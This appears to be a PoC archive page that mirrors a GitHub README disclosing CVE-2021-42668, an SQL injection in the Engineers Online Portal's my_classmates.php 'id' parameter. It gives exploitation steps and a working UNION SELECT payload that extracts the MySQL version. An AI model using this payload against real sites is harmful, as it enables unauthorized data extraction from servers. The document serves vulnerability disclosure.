Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-42668 PoC — Engineers Online Portal SQL注入漏洞

Source
https://github.com/0xDeku/CVE-2021-42668
Associated Vulnerability
Title:Engineers Online Portal SQL注入漏洞 (CVE-2021-42668)
Description:A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server.
Description
CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system.
Readme
# cve-2021-42668
CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. 

# Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "my_classmates.php" web page in order to manipulate the sql query performed.
As a result the attacker can extract sensitive data from the web server.

Affected components - 

Vulnerable page - my_classmates.php

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/my_classmates.php
2) Insert your payload in the id parameter

# Proof of concept (Poc) -
The following payload will allow you to extract the MySql server version running on the web server -
```
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;-- -
```

![CVE-2021-42668](https://user-images.githubusercontent.com/93016131/140190507-39c3361e-6ebd-4eed-9016-e9a6be6bd2db.gif)

# References - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42668

https://nvd.nist.gov/vuln/detail/CVE-2021-42668

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021.
File Snapshot

 [4.0K]  /data/pocs/4fd5c1b0c7f731bc22b894faacc0c928748309e1
└── [1.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →